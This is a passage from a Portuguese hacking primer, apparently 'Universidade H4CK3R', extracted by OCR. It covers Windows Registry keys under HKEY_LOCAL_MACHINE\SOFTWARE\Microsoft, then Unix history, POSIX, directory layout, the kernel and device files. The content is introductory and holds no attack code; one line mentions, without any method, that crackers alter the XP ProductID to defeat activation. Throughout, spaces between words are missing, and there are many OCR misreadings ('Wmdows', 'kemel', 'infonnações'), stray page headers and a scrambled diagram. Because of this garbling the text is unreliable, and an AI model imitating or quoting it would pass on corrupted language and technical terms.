IUniversidadeH4CK3R I
otesouro
Cadafabricantetemsuaprópriasubchave,eaMicrosoft,sendotambémuma
desenvolvedoradesoftware,possuiumasubchaveemHKEY_LOCAL_MACHINE\
SOFIWARE.Adiferençaéque,sendoadesenvolvedoradosistema,colocoualitudoo
quepoderiasernecessárioparaaconfiguraçãoeintegraçãocomoutrosprodutosMicrosoft.
Portanto,nãoháaquiapenasinfonnaçõessobreosprogramasMicrosoftinstalados,como
oWordouoExcel.MuitasinfonnaçõesquepodemserusadaspelosserviçosdeBackOffice,
bemcomoamaioriadosserviçosMicrosoft,possuemchavesaqui.Infonnaçõessobre
DIls,controleseplug-insActiveX,oMicrosoftInstaller(MSI)ealocalizaçãodasmídiasde
instalação,entreoutrascoisas,tambémpossuementradassobachaveMicrosoft.
Comoexercícioantesdeprosseguir,coloqueolivroumpoucodeladoe
pesquisebastanteemtodasassubchavesabaixodachaveMicrosoft.Entreem
umaporuma,verifiqueseusnomesesubchaves,verifiqueoconteúdo(nome/
dado)dosvalores.Observequeháchavesquepossuemváriosvaloresemum
nível,mesmoestetendosubchavesdenívelmaisbaixo.Nãoalterenada!Ape-
nasobserveedeixeachaveWindowsparaolmal.Pronto?Ótimo!
VamosolharcommaisatençãoachaveWindows.Nelahátrêschaves:Current
Version,ITStorageeShell.AITStorageeShellnãotêmmuitautilidadeemsiste-
masisolados,masaCurrentVersionpossuimuitasinformaçõesinteressantes.Obser-
veosvaloresdaprópriachave.EntreelestemosoProductID(que,noWmdowsXP,é,
importantíssimoparaaativação-eéumdosvaloresalteradospeloscrackerspara
burlá-Ia)eoscaminhosparaoscomponentesprimáriosdoWmdows,comoolocal
ondeestãoosarquivosdeprogramas.
Alémdessesvalores,achaveCurrentVersionabrigacentenasdesubchaves.Algu-
massãofáceisdeentender,comoachaveExplorer\Tips,quecontémas"dicasdo
dia".Épossívelalterá-Iasparacolocaroutrasdicasoumesmoincluirmaisvalores
comnovasdicas.Outrassubchavessãomaisherméticas.AsubchaveInstaller,por
exemplo,abrigadadosrelativosaoMicrosoftInstaller(MSI),masfazusodos
indecifráveisvaloresCSLID.Navegueumpoucoporessasduaschavesesóretomea
leituradolivroquandotiverumavisãogeraldofimcionamentodeambas.
Comessesfimdamentosentendidos,oRegistrodoWmdowsjánãodevesermais
ummistériotãoobscuroparaoleitor.Como"tarefaparacasa",sugerimosoestudo
(comoRegEdit)dasseguinteschaves:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EventSystem
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Outlook Express
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current
Version\
-Apppaths
182I
PlataformaWindows[

Universidade,oano
-Controlpanel
-Controls Folders
-Explorer
-Installer
-policies
-Run(programas carregados emtodososboots)
-RunOnce (programas carregados sóurnavez)
-RunOnceEx (programas carregados sóurnaveze
excluídos)
-Setup
-SharedDLLs (MUITOimportante!)
-Uninstall
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
HKEY_LOCAL_MACHINE\SYSTEM\MountedDevices
HKEY_LOCAL_MACHINE\SYSTEM\Setup
depois
LembrandosempredequetomamoscomopontodepartidaoRegistrodo
WmdowsXP.SeoleitorpossuioutraversãodoWindows,seráinteressantetambém
procurarpelasmesmaschavesnelaparaconhecerasdiferençasesemelhanças.
Whereto,buddy?9
Emumlivrocomoestenãoháespaçoparaseaprofundarmais.Felizmente,a
Internetoferecealgunsrecursosparaquemquerouprecisaconhecermais
sobreaestruturadossistemasoperacionaisdaMicrosoft.
UmbompontodepartidaéoTechNet(www.microsoft.com/technet).site
daMicrosoftdirigidoatécnicoseprogramadores.Napáginaprincipal,hálinks
paraastecnologiasmaisatuaisdaempresa,comooWindowsXPeaplataforma
.NET.Entretanto,épossívelusarosmecanismosdebuscadoprópriositepara
encontrarqualquerinformaçãosobrequalquerproduto.Comumpoucode
pesquisaépossívelconhecer,porexemplo,detalhesdaestruturainternado
kerneldoWindows98oudiferençasentreosregistrosdoWindows95edo
WindowsNT.Mesmoasespecificaçõesdecoisasmuitoantigas,comooMS-
DOSeoLANManager,podemserencontradas.Preferimosositeamericanoe
nãoobrasileirodevidoàvelocidadedeatualizações,emboraestejaeminglês.
OutrossitesemquepodemhaverinformaçõessobreplataformasMicrosoft
sãoositeprincipaldaempresa(www.microsoft.com).oWinguides
(www.winguides.com)eoTechRepublic(www.techrepublic.com).Nãodeixe
devisitá-Ios.Hámuitasinformaçõesreunidasapenasnessessites.
9Quemjogavaarcadegamesnofinaldosanos80certamentereconheceessafrase.Seaindanãodescobriu
dequejogoestamosfalando,infelizmentenãopodemosdarmaisnenhumapista.Harbarbarbarbar...
1831
]PlataformaWindows

Plataformas.
nlx
Capítulo
'Subitalvezàsmáximasalturas,Mas,sehojevolto
assim,comaalmaàsescuras.
Énecessárioqueindaeusubamais!"
AugustodosAnjos,"Solilóquiodeumvisio-
nário"dolivroEueoutrospoemas-1912

!UniversidadeH4CK3R I
Nãofomosnósquedissemos,massimaNetcraft(www:netcraft.com):66%
dosservidoresWebnaInternetrodamalgumtipodeUnix.Essamaioriaesma-
gadoradesitesqueprestigiamoveteranosaídodoslaboratóriosdaAT&Tna
décadade60nãoofazàtoa.Enquantonasmáquinasdesktop(aquelasque
vocêusaemcimadesuaescrivaninha,notrabalhoouemcasa)oMicrosoft
Windowséconsideradoopadrãodefato,emservidoresparaInternetnãohá
muitadiscussãoemtornodosistemaoperacionalaserusado.
aUnixéumsistemacommaisde30anosdeestrada.Robusto,leveeportável,
vemsendolapidadodesdeseulançamentoem1969e,apesardejáserbem
antigo,estásempreafinadocomasnovidadestecnológicas.Porserosistema
maisusado,étambémosistemamaisatacado.afatodefuncionarcomoo
motordedoisterçosdossitesdomundoemesmoassimsermuitomenosinva-
didodoquequalquerumdosadversáriosmostraaconfiabilidadedessessiste-
mas.Acontrapartidaéque,porserassimtãoconfiávelepoderoso,étambémo
sistemaoperacionalmaisusadoparaoriginarataques,qualquerquesejaoalvo.
omodeloUnixdesistemasoperacionais
Éinteressantíssimoopoderdamídia.QuandosefalaemABelaeaFera,
ninguémlembradofilmedeCocteau,consideradoumadasobras-primasdo
cinemafrancês.MuitomenosdeJeanneMarieLeprincedeBeaumont,pes-
quisadoraquenoséculo18coletoudiversoscontosmedievaissobreotema
eosreuniu,costurandoahistóriaqueconhecemoshoje.Pelocontrário,as
pessoassóselembramdodesenhoanimadorecentementelançadoporum
grandeestúdionorte-americano...
Emsetratandodesistemasoperacionaistemosomesmoproblema.Nalem-
brançadetodos,apenasossistemasmaisnovosprevalecem,mesmosendome-
nosotimizadosoumenospreparadosparaserviçosderedeemissãocrítica.
Apesardisso,aoredordoglobomilhõesdeadministradoresderedeseutilizam
dealgumavarianteUnixpararesolverproblemasqueoutrasplataformasnem
sonhamenfrentar.
assistemasUnixpodemserconsideradostantobelasquantoferas.AInternet
nãoexistiriasemossistemasUnix
-aliás,aInternetfoicriadaparainterligar
APENASsistemasUnix...Atéhoje,comoosdadosdaNetcraftpodemcompro-
var,amaioriadosservidoresWebdomundoempregaalgumavariantedeUnix,
eháesforçosparaquesistemasUnixousimilaressejamutilizadosemestações
deescritóriooumesmoemdispositivosmóveis,comocelularesepalmtops.
HámuitabelezanossistemasUnix.Suaestruturarígidaebemmontadapare-
ceaosolhosdosseususuáriosquasequecomomaravilhosospoemas.apoder
defogoqueessesistemadáaquemodominachegaaserinebriante.Porsua
origememlaboratóriosdepesquisacomoambientededesenvolvimento,oUnix
possuidiversasferramentasparaadministradoresdesistemaseredesepara
86I
PlataformaUnixr

Universidade1°ano
programadores.Tambémporessaorigem,háumaenormeefraternalcomuni-
dadedeusuáriosquetrocamexperiênciaseseajudammutuamente.Asgrandes
empresasquefabricamouoferecemsoluçõesbaseadasemUnixformaramum
consórcioedefiniramdiversospadrõesquegaranteminteroperabilidadee
conectividade.OUnixéconsiderado,exatamenteporisso,umsistemaabertol.
Sim,oUnixébelo.Masbelocomoumgrandefelino.Domá-Iorequertreina-
mento,persistênciaeumpouquinhodecoragem.Oconhecimentoparadomi-
narnossaferanãoé"rocketscience",entretanto.Aspessoassentem-seame-
drontadaspelaquantidadedeferramentasdisponíveisoupelapróprialinhade
comando.Asinterfacesgráficas,apesardenãoserem"toscas"comonosprimei-
rostempos,sãodiferentesdasqueamaioriadosusuáriosestáacostumada.Por
fim,hávários"sabores"diferentesdeUnixaescolher.Cadaqualtemseusatra-
tivos,mastambémtemsuasdillculdadese...Espereaí!Sabores?
Apenasumjogodecomputador...
Em1963,oMIT,oslaboratóriosdaBell(empresadetelecomunicações
estadunidense,subsidiáriadagigantetelefônicaAT&T)eaGeneralElectric
Companyuniram-separacriarumsistemaoperacionalrevolucionário.Obvia-
mentebaseadonoscomputadoresGE,oprojetotinhacomoobjetivos:
~Sermultiusuário;
~Sermultitarefa;
~Oferecergrandecapacidadedearmazenamentoparadadoseprogramas;
~Permitircompartilhamentodedadosentreusuáriosegrupos.
OsistemafoibatizadodeMULTICS,numareferênciaàssuascapacidades
multiusuárioemultitarefa.Apósquatroanosdedesenvolvimentoemum
GE-645,oMULTICSde1969estavamuitíssimoaquémdosobjetivospropostos.
Nessemesmoano,osBellLabsdecidiramsairdoprojeto.
Frustradoscomainterrupçãodeseusesforçosedesejososdepossuirumsiste-
maquerealmenteatendesseaospropósitosiniciaisdoMULTICS,alguns
desenvolvedoresdosBellLabsresolveram,secretamente,iniciarodesenvolvimento
deoutrosistemaoperacional.UmdessesdesenvolvedoreseraKenThompson,
quenãoqueriamaisusaroGE-645comMULTICSquehaviaficadonosBellLabs
parabrincarcomseujoguinhopreferido.OSpaceTravelsrodavamuitomalno
MULTICS,ecadapartidacustavaàAT&Taproximadamente75dólares.
Thompsondecidiuentãoportarseujogoparaoutrocomputadorqueestava
"dandosopa"nolaboratório,umPDP-7tambémdaDEC.Masosistemaoperacional
doPDP-7nãoeramuitoflexível,entãoThompsoncomeçouaescreverrotinasde
apoioparaseujoguinho.Noperíododeumano,aindaem1969,as"mandracarias"
deThompsontornaram-seaprimeiraversãodosistemaoperacionalUnix,total-
1Avisoaosmaisradicais:quandofalamosemsistemasabertos,falamosdepadrõesabertos.Adiscussão
sobresoftwarelivreecódigoabertoéumaoutrahistória...
1871
IPlataformaUnix

IUniversidadeH4CK3R I
menteescritanoAssemblerdoPDP-7.ParaconvencerseussuperioresnosBellLabs
daseriedadedoprojeto,apresentaram-nocomoumfuturosistemapara
processamentodetextos,oqueposteriormenteevoluiuparaumsistemaoperacional
deusogeral.ApalavraUnix2eraumtrocadilhocomonomedoMULTICS3.
Apenasem1971oUnixseriaconsideradoumsistemaoperacionalacabado.
Atéesseano,muitastecnologiasforamdesenvolvidasparaqueo"bebê-ux"vies-
seaomundo.UmadelasfoialinguagemC,desenvolvidaporDennisRitchiea
partirdalinguagemBdeThompson.OUnixfoitotalmentereescritoemCe
pôde,comisso,serportadoparaqualquermáquina:bastavarecompilá-Io.O
conceitodeportabilidadeéomaiortrunfodoUnixatéhojeeabriunovos
horizontesparaacomputação.Em1977,oUnixfoilançadocomosistema
operacionalcomerciale,deláparacá,vemequipandosistemastãodiversos
comodispositivosdemãoesupercomputadoresCray.
Nestelivro,usamosapalavraUnixindiscriminadamentereferindo-nosaqual-
quervariaçãoou"sabor"dossistemasbaseadosnoSing1eUnixSpecification,
queenglobaospadrõesPOSIX,XPG4eANSIC.Outrosautoresusamasnomen-
claturas*nix,u*ixeUnix-like.UnixémarcaregistradadoTheOpenGroup
(www.unix-systems.org)."SimilaresaUnix"indicasistemasqueseparecemcom
umUnix,masnãoosãooficialmente(comooGNUlLinuxeoFreeBSD).
POSIX
OstrêsdocumentosqueformamosuperconjuntoSingleUnixSpecification
aplicam-seapartesdiferentesdosistema.ANSICéopadrãoparaalinguagem
deprogramaçãorecomendadaparaodesenvolvimentodesistemasUnixepode
serencontradoem(www.ansi.org).JáoXPG4éopadrãoparaimplementaçãodo
servidorX,oprogramacentralparaaplicaçõesgráficasemUnix.Informaçõessobre
aespecificação,oservidorXeoXConsortiumpodemserobtidasem(www.x.org).
Masháummaisimportantequeosoutrosdois.TodoUnixqueseprezedeve,
obrigatoriamente,aderiraoPOSIX,umpadrãomantidoporváriasentidades:
IEEEeOpenGroup,nosEstadosUnidos,eISO/IEC,naEuropa.Eledefineas
chamadasdesistema,ouseja,asmensagensesinaisqueosprocessosvãotro-
carentresi.PodemsercomparadasàsmensagensdoWindowsquevimosno
capítuloanterior,masassystemcallsdoUnixsãomuitomaisnumerosas,
especializadasemodulares.
2NãoháespaçoaquiparacontartodaainteressantíssimahistóriadoUnix.Umdosmelhoresdocumen-
tossobreosprimeirosdias,escritoporDennisRitchie,podeserencontradonoendereço
cm.bell-labs.com/cm/cs/who/dmr/hist.htmI.Alémdecuriosidadeshistóricas,sãodescritososfatosque
levaramoUnixaseparecercomoqueéhoje.
3NãopensequeoMUL11CSmorreuem1969!SeudesenvolvimentocontinuoueaGE(depoiscomprada
pelaHoneywelle,maisrecentemente,pelaBulI)utilizou-Qcomoumdeseussistemasprincipaispormuitos
anos.OúltimosistemaMUL11CSaindaem1imcionamentofoioficialmentedesativadoem31deoutubrodo
ano2000.ParasabermaissobreMUL11CS,visiteositedosaficionados:www.multicians.orl!.Umensaio
sobreoquantooUnixfoiinspiradonoMULTICSpodeservistoemwww.muIticians.orl!/unix.htmI.
188I
PlataformaUnixr

Universidade1°ano
DezenasdesaboresàsuaescoLha
TalvezoleitorsoubesseaquenosreferíamosquandodissemosqueoUnix
eraumsistemaoperacionalaberto.Maisainda,quandocitamosquehaviadiver-
sos"sabores"disponíveis.MasUnixéumsistemaoperacionalenãoumsorvete.
Quenegócioéessede"sabor"?
Sendoumpadrãoaberto,oSingleUnixSpecificationpermitequevários
fabricantespossuamasuaprópriaimplementação.Mesmosendoextrema-
mentediferentesemalgunscasos,aindasãoconsideradosUpicesporqueade-
remaopadrãoUnix-98(aúltimaversãodoSingleUnixSpecification).Com
efeito,podemoscitaralgunsdesenvolvedoresdesoftwarequepossuemver-
sõesdosistema:
~SunMicrosystems,comseuSolaris;
~IBM,comoAIX;
~SGIeoIRIX;
~BSDicomaimplementaçãoBSDeaversãogratuitaFreeBSD;
~Hewlett-PackardeseuHP-UX;
~AprópriaMicrosofteofmadoXenix;
~AfamíliaGNUlLinux.
Citamosapenasosmaisconhecidos.Existemmuitasoutrasimplementações
Unix,comerciaisounão.Oquechamamosde"famíliaGNUlLinux"éumconjun-
todecentenasdedistribuiçõesdiferentesdessesistemaoperacionaldecódigo
aberto,cadaumadelascomsuasprópriasidiossincrasias.
Porqueessaconfusão?Nadécadade80,quandováriasimplementaçõesco-
merciaiscomeçaramaserdesenvolvidas,cadafabricanteacaboucriandoseus
própriospadrõese"puxandoasardinhaparaoseulado".OsUnicestornaram-
setãodiferentesentresiqueacabaramnãosendointeroperáveis.Umarede
heterogêneaeraimpossívelnaépoca,ehojeopadrãoUnix-98tentaderrubar
essasdiferenças.
Asentranhasdafera
Todasasrecomendaçõesquejádemosnocapítuloanteriorvalemparaeste
também(eparatodosossubseqüentes-repetiremo-Iosdiversasvezes,quase
quecomoumalavagemcerebral...).Todohackerqueseprezedeveconhecer
sistemasUnix,mesmoqueosodeie.Épossívelque,depoisdaleituradeste
capítulo,antigosdetratoresdessedecanomudemdereligiãoepassemarezar
naigrejadeKenThompson.Mas,convencidoounão,ossistemasUnixcerta-
mentefarãopartedesuavidadeciberativista.
1891
IPlataformaUnix

IUniversidade
Estrutura
Ossistemasoperacionaisdafanú1iaUnixpodem,parafinsdidáticos,serdividi-
dosempartesclassificadasporfunção:kemel(cemeounúcleo),shell(concha
oucasca)eprogramasdousuário(aplicativoseferramentas).Comoessaabor-
dagemémuitoparecidacomaprópriadefiniçãodesistemaoperacional,po-
demosusarumasimplificaçãododiagramaemcamadasparademonstrá-Io.
Essestrêsgrandescomponentesseutilizamdeuma
estruturafísicauniversalchamadadesistema
dearquivos.Antesdeentraremdetalhesso-
breshell,systemcalls,processose
kemel,vamosmergulharumpou-
conessainfra-estruturasobrea
qualtodososUnixsãomon-
tados.Sãonecessáriosal-
gunsfundamentoseco-
mandosdoshellpara
percorrê-Io.Casotudo
issosejamuitonovo
paravocê,consulteo
apêndiceE,"Bê-á-bá
doUnix".
Sistemade
arquivos
oMicrosoft
Windows possui
umaestruturabási-
cadediretórios.En-
tretanto,elaexiste
comoconseqüência
daestruturaçãodosistema,nãocomocausa.Osarquivosdesistemarelevantes
estãofrouxamenteorganizadosnodiretórioWindows (ouWinNT)e
subdiretóriosdentrodele.Mesmoaspartesdokemelestãodispostasemarqui-
vosseparados,misturadoscomoutrascentenasdearquivosdísparesjogados
dentrodeC\WlNDOWS. Ograndeagenteaglutinadordosistemaoperacional
microsoftianoéoRegistrodosistema4.
4LembrandoqueoRegistrodossistemasWindowséfisicamentegravadoemdiversosarquivos,eque
cadaversãopossuiumconjuntodiferentedeles.QuandofalamosemorganizaçãodoRegistroaqui,estamos
nosreferindoàorganizaçãológica,aquelaqueéapresentadaaousuárioquandoeleabreoEditorde
Registroequeécomumatodasasversõesdosistema.
'°I
PlataformaUnixI

Universidade1°ano
OsUnix,poroutrolado,sãoestruturadosjustamenteapartirdosistemade
arquivos.Qualquercoisaquepossasermanipuladanosistemaétratadacomo
umarquivo.Issoincluidispositivosdehardware(comosuaplacadesomoua
portadeimpressora),osprocessosemexecuçãoe,obviamente,osarquivos
comuns.Épossível,porexemplo,copiarumMP3paradentrodoarquivocorres-
pondenteàsuaplacadesom:comopormágica,amúsicasoaránosalto-falantes.
Osarquivosligadosaosprocessosemexecuçãopodemserusadosparacontrolá-
los.Leressesarquivosnormalmentenospermiteteracessoainformaçõesso-
breoprocesso;e,grossomodo,podemosescrevernelesparamandarmensa-
gensaoprocesso.
NãoháindicaçãonopadrãoPOSIXarespeitodaorganizaçãohierárquicade
diretórios:sistemasdearquivosUnixseguemumpadrãotácitoenãooficial.
Hádiversosdocumentoseproposiçõestécnicasarespeito,comooFileHierarchy
Standard(www.pathname.com/fhs).masnenhumadesenvolvedoracomercial
deUnixéobrigadaasegui-los.AúnicaexceçãosãoossistemasGNU/Linux,que
possuemumapadronizaçãoespecíficaerígidaparaissonaLinuxStandard
Base(www.1inuxbase.org).
Mesmonãohavendoumdocumentooficial,háumconsensonadistribuição
dediretóriosemumsistemaUnix.Excetopordiferençasmuitosutis,a"árvore"
dediretóriosdequalquersabordeUnixseparececomesta.Ahierarquiade
diretóriosé,naverdade,umsuperconjuntoouuniãodasprincipaisestruturas
dos"sabores"maiscomuns.Emalgunssitemas,porexemplo,nãotemoso
/proc;emoutros,o/devexiste,maspossuioutronome;eaorganizaçãoabaixo
de!lib,/usre/vartambémvariaentreosdiversostiposdeUnix.Maso"esque-
leto"ébasicamenteesse,eapartirdeleémuitofácildescobrireentenderas
diferençasdeumsistemaemespecial.
Odiretórioprincipal,aquelequecontémtodososoutros,échamadoderaiz,
apesardeestarnotopodaestrutura5.Érepresentadoporumsinaldebarra
(I)
-nãoconfundircomabarrainvertida()usadanoWindows-equalquer
arquivooudiretórioéreferenciadoapartirdele.Porexemplo,odiretóriotmp
deveserrepresentadocomo/tmp.Umarquivoqualquerdentrododiretório
/tmpseriaencontradosedéssemosoendereçocompleto:/tmp/arquivo.
Cadaumdosdiretóriospossuiumafunçãoespecífica:
~Ibin:ferramentasnecessáriasparaaoperaçãodosistema;
~/sbin:ferramentasdoadministradornecessáriasparaaoperaçãoemanu-
tençãodosistema-o"s"édesuperuser;
~/dev:cadadispositivodehardwareinstaladopossuiumarquivoneste
diretório;
~/etc:osarquivosdeconfiguraçãodosistemaedosprogramasestãonestediretório;
5Considerequenossaestruturaéumaárvoreinvertida(galhosnochãoeraizesaocéu)eavisualízação
flcaráfácil.
191I
]PlataformaUnix

I
UniversidadeH4CK3R I
/
bin
dev
etc
home
lib
mnt
proc
sbin
tmp
usr
bin
doc
etc
include
lib
local
man
sbin
share
src
var
192I
PlataformaUnix
[
~/home:cadausuáriocadastradonosistemapossui
umdiretóriocomseunomeem/home-estaéaúnica
áreadediscoqueamaioriadosusuáriosestáautoriza-
daautilizarparagravarseusarquivos;
~/lib:asbibliotecasdefunçõesdosistemaestãoaqui
-considere-ascomoas"DLLs"doUnix;
~/mnt:diretóriousadoparaconexãoavolumespre-
sentesemoutroscomputadoresdaredeouparaacessar
dispositivosremovíveis,comodisquetes,fitasmagnéti-
caseCDs;
~/proc:arquivosrepresentandoosprocessosemexecução;
~/tmp:espaçoparaarquivostemporáriosgerados
pelosprogramasoupelosprópriosusuários;
~/usr:osaplicativosdousuárioestãoinstaladosabai-
xode/usr;
~/var:informaçõesvariáveisdosistema(spooldeim-
pressora,caixaspostais,cachedeInternet,logdosiste-
ma,etc.).
odiretório/usrémuitoimportante.Praticamentetudoo
queosusuáriosvãoutilizarestánele.Masporqueesse
diretórioexiste?NãoseriamaisfácilcolocartudoemIbin?
Normalmente,oIbineo/sbincontêmapenasospro-
gramasestritamentenecessáriosparaqueocomputa-
dorfuncioneepossadarbootouserreparado.No/usr
estãoguardadosorestantedosprogramasdosusuários
(ferramentas,editoresdetexto,navegadoresdeInternet
eambientesgráficos)bemcomoadocumentaçãodosis-
temaeosarquivoscompartilhados.O/usrpodeestarna
mesmapartiçãodoIbinedo/sbin.Mastambémpode
estaremoutrapartição,quesóéacessadapelosistema
depoisqueoUnixterminasuainicialização.
O/usrpodeaindaestaremumamáquinacentralizada
narede,queexportaum/usrcomumatodasasestações
Unix.Comisso,oadministradortemdeinstalarprogra-
masapenasumavezemvezdefazê-Ioemcadaumdos
computadoresUnixsobsuasupervisão.
O/usréquaseum"mini-root":contémseuspróprios
bin,sbin,lib,etc.,quesão,respectivamente,osdiretórios
deprogramascomunsdousuário,ferramentasdo
superusuário,bibliotecasdefunçõesdosprogramasabai-
xodo/usrearquivosdeconfiguraçãodosprogramas
abaixodo/usr.Alémdisso,possuidiretóriossóencon-

Universidade1°ano
tradosnele.Adupla/usr/includee/usr/srcpresta-separaacompilaçãodeprogra-
masapartirdocódigo-fonté.O/usr/docguardaumagamavariáveldedocumentos
sobreosistemaeosprogramasinstalados.Jáo/usr/manencerraadocumentação
oficialdosistema,aschamadasmanpages.O/usr/sharepossuiqualquertipode
arquivo(imagens,sons,configurações)quedevesercompartilhadoportodosos
programaseusuários.
Porfim,odiretório/usr/localéum"mini/usr".Possuiumaestruturadediretórios
praticamenteidênticaao/usr.Serveparaqueprogramaslocaispossamserinstala-
dosemcomputadoresquepossuamo/usremoutramáquinanarede.Apesarde/usr
terapossibilidadedeserum"drivederede",o/usr/localcontinuasendoarmazena-
dolocalmentenoHD.
VasculheseusistemaUnixantesdeprosseguir.Nãosepreocupe-sevocênãofor
osuperusuárioeusarsomenteoscomandosnão-destrutivoscomocd,lsecat,nãohá
possibilidadede"estragar"nada.Depoisdefazê-lo,váparacasa,searrumeesaia,
comofeznocapítuloanterior.Ouantes,largueestelivroepegueCrimeeCastigo,
deDostoiévski.Ouvátocarflautadoce.MasrelaxeenãopenseemUnixatéamanhã.
ocernedaquestão
Okerne1criaprocessostodavezquepedimosaosistemaoperacionalpara
rodarumprograma.Alémdecriá-los,okernelcuidaparaqueelescolaborem
entresienãosedestruammutuamente,etambémgerenciaosrecursos(memó-
ria,CPU,periféricos)quecadaprocessoutiliza.
Compareodiagramadapróximapáginacomodocapítuloanterior.Pode-se
verclaramentequeaimp1ementaçãoUnixdifereradicalmentedesuaequivalen-
teWindows.EnquantoosistemadaMicrosoftutilizaoconceitodemicrokerne1 -
apenasasfuncionalidadesbásicasestãonokerne1ehádiversossubsistemasro-
dandoemusermode-,noUnixtudoestáembutidonumnúcleomonolítico.
Mesmoemimplementaçõescujokerne1émodular,osmódulostambémrodam
emkerne1mode.Apenasosprocessosdosprogramaseserviços(daemons)ro-
damnoespaçodousuário.
6odíretório/usr/includearmazenaoscabeçalhoscomosprotótiposdasfunçõesemCpresentesnas
bibliotecas/libe/usr/lib,enquantoo/usr/srcrecebeoprópriocódigo-fonteasercompilado.
1931
IPlataformaUnix

IUniversidadeH4CK3R I
----------------------
Interfacedeserviço
J
FileSystem
J
GestãodememóriaeInput/Output
"oDOPro
Hardware
Osprocessoscomunicam-se
comokeme1pormeiodecha-
madasdesistemaousystem
ca11s(a"interfacedeserviços"
mostradanodiagrama).As
systemca11sinteragemcomos
componentesdoSOpormeio
dosistemadearquivos(nãose
esqueça:emUnixtudoéarqui-
vo).Porele,okeme1controla
ohardware,osarquivosdousu-
árioeosprópriosprocessos,
quesãoobjetodeum
escalonamentoouscheduling
paradefinirasprioridades,a
ordemdeexecuçãoea
interaçãoentreeles.Comoo
hardwaretambémétratado
pelosistemadearquivos,o
núcleodossistemasUnix
nadamaisédoqueum
supergerenciadorinteligente
dearquivos.
1941
PlataformaUnix[
Programas
!
IBibliotecasdeSistema I
f
UserMode
KernelMode
Usuário
Sistema
!
Systemcall1nterface
!
ControledeProcessos
Comunicaçãoentre
processos
Scheduler
;.Caracter
Oriented
IOriented.
D.~y.!!t~.Q.ril,l~nL..
f
Gestãodememória
ControledeHardware
Sistema
Hardware

Universidade1°ano
Numexamemenossimplificado,vemosqueosprogramasacessamfunções
disponíveisnasbibliotecasdosistema.SemelhantesàsDLLsdossistemas
Windows,asbibliotecascompartilhadas(sharedobjectsouso)dossistemas
Unixpermitemqueváriosprogramascompartilhemasmesmascaracterísticas.
Adiferençaéamaioropçãodeescolha.OUnixéumsistemamuitomaismodu-
lardoquequalqueroutro.Issosignificaqueoprogramadortemmuitasopções
debiliotecasparabasearseusprogramas.
Umexemploéainterfacegráfica.NoWindowselaencontra-seemumaúnica
biblioteca(GDI.DLL).JánoUnixtemosdiversostoolkitsgráficos,todoseles
"encaixáveis"noservidorX.OmaisfamosoéoMotif,mashámuitosoutros.
comooGTK,oQteoTk.
Sejadiretamenteouatravésdasbibliotecas,osprocessosemitemsystemcalls
paraokerne1,solicitandoalgumacoisa.Nokerne1hárotinasparacontrole
dessesprocessos(escalonamento,comunicaçãoememória)eparaacessaros
recursosdosistemapormeiodosistemadearquivos.
Dispositivos
Osdispositivosdosistemapresentesem/devsãoarquivosespeciaisquese
comunicamcomohardware.Melhordizendo,sãorepresentações(imagens)dos
dispositivosemformatodearquivo.Todaadiscussãosobreinterrupthandlers
quetivemosnocapítulosobreoWindowsvaleparaossistemasUnixtambém.
MasaocontráriodoWindows,ossistemasUnixdependemmuitopoucodaBIOS
emsistemasbaseadosemhardwarePC.Todasasfunçõesoriginalmenteacargo
daBIOS(excetuando-seainicializaçãodamáquina)sãoimplementadasnokerne1.
OutrasplataformasdehardwaresequerpossuemalgoparecidocomumaBIOSde
PCe,portanto,aimplementaçãodessasfunçõesnokerneléobrigatória.
Lembram-sedecomoosdispositivoseramacessadosnoWindows,pormeio
dedevicedriverseVxDs?NoUnix,obviamente,tambémhádevicedrivers.Mas
aocontráriodoWindows,osdriverssãomódulosdokerne1.Taismódulospo-
demsertantocompiladosnoprópriokerne1demaneiramonolíticacomocar-
regadossobdemandanamemória,seforemcompiladoscomoautônomos.Aí
resideadiferençaradicalentreaabordagemmicrokerne1doWindowseade
kerne1monolíticodoUnix.Osarquivosdedispositivopresentesno/devcomu-
nicam-secomosdevicedrivers
-e,portanto,comoprórpiokernel,quese
encarregadecontrolarohardwareparaoqualodriverfoiescrito.
Osnomesdosdispositivossãoorganizadosdeformasimples.Normalmenteé
umgrupodeduasaquatroletrase,opcionalmente,números.Porexemplo,o
primeirodiscorígido(ouqualquerdispositivoIDE)instaladoemumsistema
Linuxéo/dev!hda,osegundoéo/dev!hdb.EmumSolaris,osmesmosdiscos
estãorepresentadospelosarquivos/dev/dsk/cOtOdOecOtldO.Hátrêstiposde
dispositivos:debloco,decaracteredeinterfacesderede.
Osdispositivosorientadosacaractere(characterdevicesou,ainda,chardevices)
1951
IPlataformaUnix

IUniversidadeH4CK3R I
sãoaquelesquepodemseracessadoscomoumarquivocomum.Vocêpode
escrevernelesoulerapartirdeles,sempreumbyteporvez.Defato,osdrivers
queimplementamessesdispositivosaceitamsermanipuladosporfunçõespri-
mitivascomoopen(),close(),read()ewrite().Algunsexemplossãoasportas
seriais,otecladoeomouse.
Éóbvioquehádiferençasentreosdispositivosdecaractereeumarquivoco-
mum.Seforcriadoumarquivocomume,dentrodele,forgravadaafrase"Hey
Beavis,I'maUnixstring!",épossívelrecuperaressafrasetodavezqueoarquivo
forlido.Umchardevice,poroutrolado,éapenasumcanaldecomunicaçãoentre
oespaçodousuárioeodispositivo.Oqueforenviadopormeiodo/devétratado
pelohardwareenãopodemaisserrecuperado.Quandosetentalerdodisposi-
tivo,oqueseobtémsãoosdadosqueomesmoestáenviandoaosistemade
arquivosnaquelemomento,nãoosgravadosanteriormente.
Osdispositivosorientadosabloco(b10ckdevices),poroutrolado,sópodem
seracessadospormeiodegrandespacotesdeinformação.Normalmenteencer-
ramemsicomponentesnosquaisépossívelguardarsistemasdeaquivos,como
HDs,disqueteseCD-ROMs.Umdiscorígido,namaioriadossistemasUnix,só
podeseracessadoemblocosde1kbyte.Sefornecessáriogravar,porexemplo,
apenas128bytesnodisco,seráusadoumblocode1Kbyte(1024bytes)paratal.
Osb10ckdevicespossuem,porissomesmo,umavelocidadedetransferência
(throughput)muitomaiordoqueosdispositivosdecaractere.Tambémportrans-
feriremgrandesquantidadesdedados,podemcontarcomumaáreadetransfe-
rênciaauxiliar(buffer)dotipocache,queaumentaaindamaisothroughput.
